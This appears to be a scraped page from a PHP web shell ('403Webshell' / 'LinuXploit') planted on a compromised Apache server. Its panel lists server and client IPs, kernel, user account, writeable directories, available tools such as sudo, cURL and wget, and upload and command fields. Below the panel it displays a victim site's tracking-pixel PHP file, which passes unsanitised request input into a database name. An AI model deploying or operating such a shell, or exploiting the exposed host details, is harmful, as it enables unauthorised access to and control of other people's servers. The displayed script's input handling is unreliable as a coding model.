403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/pcisecureform.com/lcapi/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/pcisecureform.com/lcapi/KeywordImpressionTracking.php
<?php
require_once($_SERVER['DOCUMENT_ROOT'].'/php/db_config_lc_user.php');

$site = $_REQUEST['site'];
if(empty($site)) {
} else {
	$db = connect_lc2user_new("lc2{$site}_lc");
	$res = $db->get_results("SELECT r.id FROM lc_reseller r LEFT JOIN lc_leads l ON l.customerID=r.id WHERE l.ip_address='".$db->clean($_REQUEST['ip_address'])."'");
	if(empty($res)) {
	$db->query("INSERT IGNORE INTO keyword_impressions (ip_address,keywords,landing_page,date_hit,referer_domain)
			VALUES (
				'".$db->clean($_REQUEST['ip_address'])."',
				'".$db->clean($_REQUEST['keywords'])."',
				'".$db->clean($_REQUEST['landing_page'])."',
				'".date('Y-m-d')."',
				'".$db->clean($_REQUEST['referer_domain'])."'
			)");
	}
}

header('Content-Type: image/gif');
echo base64_decode('R0lGODlhAQABAJAAAP8AAAAAACH5BAUQAAAALAAAAAABAAEAAAICBAEAOw==');
exit();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit